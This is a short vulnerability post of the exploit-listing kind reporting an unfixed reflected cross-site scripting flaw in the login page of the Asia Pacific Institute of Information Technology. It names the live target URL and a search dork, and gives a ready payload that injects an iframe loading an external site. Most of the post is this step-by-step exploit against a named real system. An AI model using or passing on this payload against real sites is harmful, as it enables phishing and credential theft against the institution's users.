Asia Pacific Institute of Information Technology (APIIT) Ref. XSS

2018.04.13

da74 (MY)

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: webspace login

Reflected Cross Site Scripting (Unfixed) bug found in login page of sia Pacific Institute of Information Technology (APIIT)
Exploit Details:
1) Goto: http://titan.apiit.edu.my/db_authentication/login.asp?REDIRECTPAGE=http://lms.apiit.edu.my/login/login.php&APPID=MOODLE&SID=t8n96koto95hsffthdb71cvdd0&ER=URI&CID=
2) At the end of URL, paste: <xml id="X"><iframe src="http://cyberjokers.pe.hu/"></iframe></xml>
3) See the iframe load an external website
Found By: da74

See this note in RAW Version

Vote for this issue:

92%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Asia Pacific Institute of Information Technology (APIIT) Ref. XSS

Dork: webspace login

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.